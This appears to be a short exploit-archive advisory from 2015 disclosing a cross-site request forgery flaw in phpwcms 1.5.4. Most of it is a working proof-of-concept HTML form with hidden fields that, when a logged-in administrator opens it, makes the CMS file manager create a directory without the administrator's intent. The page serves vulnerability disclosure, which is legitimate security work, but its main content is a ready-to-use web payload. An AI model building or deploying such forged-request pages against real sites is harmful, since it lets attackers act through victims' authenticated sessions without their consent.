Home / exploitsPDF  

PHPWCMS 1.5.4 Cross Site Request Forgery

Posted on 24 June 2015

​# Affected software: phpwcms # Type of vulnerability:csrf # URL:http://www.opensourcecms.com/demo/2/54/phpwcms # Discovered by: provensec # Website: provensec.com #version:1.5.4 # Proof of concept no csrf protections were used on directory creation page <html> <body> <form action=" http://demo.opensourcecms.com/phpwcms/phpwcms.php?do=files&f=0" method="POST"> <input type="hidden" name="dir_newname" value="fff" /> <input type="hidden" name="dir_longinfo" value="fff" /> <input type="hidden" name="dir_gallery" value="0" /> <input type="hidden" name="dir_sort" value="0" /> <input type="hidden" name="dir_aktiv" value="1" /> <input type="hidden" name="dir_pid" value="0" /> <input type="hidden" name="dir_aktion" value="1" /> <input type="hidden" name="Submit" value="create new dir" /> <input type="submit" value="Submit request" /> </form> </body> </html> ​

 

TOP